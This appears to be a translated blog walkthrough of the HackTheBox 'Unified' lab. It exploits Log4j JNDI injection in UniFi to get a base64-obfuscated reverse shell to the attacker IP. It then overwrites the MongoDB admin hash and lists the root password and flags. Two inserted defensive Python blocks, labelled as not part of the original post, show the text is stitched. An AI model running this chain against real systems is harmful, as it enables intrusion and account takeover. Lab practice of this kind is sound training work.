Penetration testing learning, day 8


Target machine: Unified

Task1

Question: What are the first four open ports?

22,6789,8080,8443

Scan with nmap

Task2

Question: What is the title of the software running on port 8443?

UniFi Network

Scan again with nmap

nmap -sV -v -sC -p 8443 --min-rate 1000 10.129.96.149


Task3

Question: What version of the software is running?

6.4.54

The nmap scan results show an HTTP service on port 8080.
Visiting it in a browser reveals the version.

Task4

Question: What is the CVE of the identified vulnerability?

CVE-2021-44228

Just search online for known vulnerabilities affecting this version.

5-14 Problem solving process

It turns out to be a Log4j vulnerability. We capture the POST request to /api/login and craft the request body below to verify whether the Log4j vulnerability is present, i.e. whether the injected payload gets processed:

{
    "username":"1",
    "password":"1",
    "remember":"${jndi:ldap://10.10.14.212/whatever}",
    "strict":true
}
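As an added example (not part of the original post), here is a small Python check a defender could run over login request bodies or web-server logs to flag JNDI lookups like the one in the body above and pull out the callback host and port for blocking or alerting. It reuses the post's request body as constructed sample data; the function and regex names are my own, and the DEFAULT_PORTS table and the second sample log line are assumptions I constructed.

```python
import json
import re

# A JNDI lookup embedded in a string value, e.g. ${jndi:ldap://10.10.14.212/whatever}.
# Case-insensitive; captures the JNDI scheme and the host[:port] of the callback URL.
# (Hypothetical helper names; not from the original post.)
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//(?P<hostport>[^/}\s]+)",
    re.IGNORECASE,
)

# Default port per JNDI scheme when the payload URL omits one (assumed table).
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}

# Constructed sample: the login body from the post, serialised as a server would log it.
SAMPLE_LOGIN_BODY = json.dumps({
    "username": "1",
    "password": "1",
    "remember": "${jndi:ldap://10.10.14.212/whatever}",
    "strict": True,
})


def _walk(node, path="$"):
    """Yield (json_path, text) for every string value in a parsed JSON document."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")


def find_jndi_lookups(body):
    """Return one finding per JNDI lookup in an HTTP request body.

    The body is walked as JSON when it parses (so the finding names the offending
    field, e.g. $.remember); otherwise the raw text is scanned.  Each finding holds
    the JSON path, JNDI scheme, callback host and callback port (scheme default if
    the URL has none).  Bracketed IPv6 literals are not handled.
    """
    try:
        strings = list(_walk(json.loads(body)))
    except ValueError:
        strings = [("$raw", body)]

    findings = []
    for path, text in strings:
        for m in JNDI_RE.finditer(text):
            scheme = m.group("scheme").lower()
            host, sep, port = m.group("hostport").rpartition(":")
            if not sep:                      # no explicit port in the URL
                host, port = port, DEFAULT_PORTS.get(scheme)
            else:
                port = int(port) if port.isdigit() else None
            findings.append({"path": path, "scheme": scheme, "host": host, "port": port})
    return findings


def scan_request_log(lines):
    """Scan constructed log lines of the form '<method> <url> <body>' and return
    the (url, finding) pairs worth alerting on."""
    alerts = []
    for line in lines:
        method, url, body = line.split(" ", 2)
        for finding in find_jndi_lookups(body):
            alerts.append((url, finding))
    return alerts


if __name__ == "__main__":
    # Constructed log lines: one benign login, one carrying the lookup from the post.
    sample_log = [
        'POST /api/login {"username":"alice","password":"x","remember":false,"strict":true}',
        "POST /api/login " + SAMPLE_LOGIN_BODY,
    ]
    for url, finding in scan_request_log(sample_log):
        print(f"ALERT {url}: JNDI {finding['scheme']} callback to "
              f"{finding['host']}:{finding['port']} in field {finding['path']}")
```

Walking the JSON rather than grepping the raw line means the alert names the exact field (here $.remember), which is what you want when deciding whether a WAF rule or an application-side input check is the right fix; the extracted host and port are also what you would add to an egress block list.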

LDAP (Lightweight Directory Access Protocol) uses port 389 by default. If the vulnerability is present, the injected lookup makes the target send a request to port 389 on our machine.
Let's set up a listener:

sudo tcpdump -i tun0 port 389

Note: tcpdump is a command-line packet capture tool, like Wireshark, that can capture this traffic.

The capture succeeds, showing the target host connecting from its port 37900 to our local LDAP port.
The tool preparation is as follows

Tools to prepare:
openjdk-11-jdk
sudo apt-get install openjdk-11-jdk -y 
Maven
sudo apt-get install maven -y
Build with Maven
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi 
// switch to the Aliyun mirror here, otherwise downloads are very slow
mvn package  

Then prepare the reverse shell.

Execute the following command

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTIvMTAyOCAwPiYxJw==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.212"

Then start the listener and send the request from Burp Suite.
The reverse shell comes back successfully.
Then find the user flag first.

Check the MongoDB port status

ps aux | grep mongo

The query result contains the running command and its parameters:

bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1

which shows that MongoDB is listening on port 27117 (bound to 127.0.0.1 only).

Try to read the administrator password: the UniFi application's default database is ace, so query the admin collection

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

Note: the --eval parameter runs the given JavaScript expression against the database.

This reveals the administrator account and its password hash.
x_shadow is the password hash: the $6$ prefix indicates the SHA-512 crypt algorithm, followed by a 16-character salt and then the hash itself.

A hash starting with $6$ was produced with SHA-512;
starting with $1$, with MD5;
starting with $2$, with Blowfish;
starting with $5$, with SHA-256. An asterisk means the account is locked.

PS: this notation is the one used in the Linux shadow file.
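As an added example (not from the post), a Python parser for the shadow-style hash notation listed above: it classifies a field by its prefix, extracts the salt, and checks that the hash body has the length the algorithm is supposed to produce, which is a quick sanity check when reviewing an x_shadow value. It goes slightly beyond the post's list by handling the optional rounds= field of SHA-crypt and the bcrypt prefix variants; the function name and the HASH_LEN table are mine, and the x_shadow value used below is the one from the post.

```python
import re

# Prefix -> algorithm, as listed in the post for the Linux shadow file (modular crypt
# format).  bcrypt appears with several prefix variants in practice.
CRYPT_IDS = {
    "1": "MD5",
    "2": "Blowfish", "2a": "Blowfish", "2b": "Blowfish", "2y": "Blowfish",
    "5": "SHA-256",
    "6": "SHA-512",
}

# Expected length of the encoded hash body: MD5-crypt 22, SHA-256-crypt 43, SHA-512-crypt 86.
HASH_LEN = {"MD5": 22, "SHA-256": 43, "SHA-512": 86}

B64 = r"[./0-9A-Za-z]"          # crypt's base64 alphabet
SHA_CRYPT_RE = re.compile(
    rf"^\$(?P<id>[56])\$(?:rounds=(?P<rounds>\d+)\$)?(?P<salt>[^$]{{1,16}})\$(?P<hash>{B64}+)$")
MD5_CRYPT_RE = re.compile(rf"^\$1\$(?P<salt>[^$]{{1,8}})\$(?P<hash>{B64}+)$")
BCRYPT_RE = re.compile(
    rf"^\$(?P<id>2[aby]?)\$(?P<cost>\d\d)\$(?P<salt>{B64}{{22}})(?P<hash>{B64}{{31}})$")

# The x_shadow value printed by the post's db.admin.find() query.
X_SHADOW = ("$6$jaYBW0iCZNXzIuZk$FtGH/we0.hTsf63jTv6fh3sgcPP/J0uIXKXp0ADNWelcqW0ykcTiwnkvI."
            "YePmnRpYMKZ24cqsSCxxg2RtBBs1")


def parse_crypt_hash(field):
    """Classify a shadow-style password field (hypothetical helper, not from the post).

    Returns a dict with algorithm, salt, hash, rounds, locked and well_formed, where
    well_formed means the hash body has the length the algorithm is supposed to produce.
    """
    result = {"algorithm": None, "salt": None, "hash": None, "rounds": None,
              "locked": False, "well_formed": False}
    if field.startswith(("*", "!")):
        result["locked"] = True          # '*' (and '!' in shadow) mark a locked account
        return result
    if m := SHA_CRYPT_RE.match(field):
        algo = CRYPT_IDS[m["id"]]
        result.update(algorithm=algo, salt=m["salt"], hash=m["hash"],
                      rounds=int(m["rounds"]) if m["rounds"] else 5000,   # sha-crypt default
                      well_formed=len(m["hash"]) == HASH_LEN[algo])
    elif m := MD5_CRYPT_RE.match(field):
        result.update(algorithm="MD5", salt=m["salt"], hash=m["hash"],
                      well_formed=len(m["hash"]) == HASH_LEN["MD5"])
    elif m := BCRYPT_RE.match(field):
        result.update(algorithm="Blowfish", salt=m["salt"], hash=m["hash"],
                      rounds=2 ** int(m["cost"]), well_formed=True)
    else:
        # Known prefix but malformed body (e.g. over-long salt): report the algorithm only.
        prefix = re.match(r"^\$([^$]+)\$", field)
        result["algorithm"] = CRYPT_IDS.get(prefix.group(1)) if prefix else None
    return result


if __name__ == "__main__":
    info = parse_crypt_hash(X_SHADOW)
    print(f"{info['algorithm']} crypt, salt={info['salt']}, rounds={info['rounds']}, "
          f"well_formed={info['well_formed']}")
```

The well_formed flag is the useful bit for a defender: an administrator record whose hash body is not 86 characters for a $6$ prefix, or whose salt changed between two audits, is a sign that the value was written by something other than the application's own password routine.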

Of course, you can also identify the hash type directly with the tool hashid, which reports sha512.
Because it is a hash, it cannot be reversed, so the only option is to replace it.
Replace the administrator hash in MongoDB: generate a new SHA-512 hash for a password of our choosing, then update it with the following NoSQL syntax:

mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$jaYBW0iCZNXzIuZk$FtGH/we0.hTsf63jTv6fh3sgcPP/J0uIXKXp0ADNWelcqW0ykcTiwnkvI.YePmnRpYMKZ24cqsSCxxg2RtBBs1"}})'

Querying again shows that the hash has been changed to the one we set.
We log in directly; in the settings we find that SSH access is enabled and the root password is shown.
The SSH connection succeeds.
Continue to get the root flag.

Task5

Question: What protocol does JNDI utilize in injection?

ldap

Task6

Question: What tools do we use to intercept traffic, indicating a successful attack?

tcpdump

Task7

Question: Which port do we need to intercept traffic transmission?

389

Task8

Question: On which port is the MongoDB service running?

27117

Task9

Question: What is the default database name for UniFi applications?

ace

Task 10

Question: In MongoDB, what is the function we use to enumerate the users in the database?

db.admin.find()

Task11

Question: In MongoDB, what is the function we use to update a user in the database?

db.admin.update()

Task12

Question: root password

NotACrackablePassword4U2022

Submit user flag

6ced1a6a89e666c0620cdb10262ba127

Submit root flag

e50bc93c75b634e4b272d2f771c33681


Origin blog.csdn.net/m0_73512445/article/details/134832753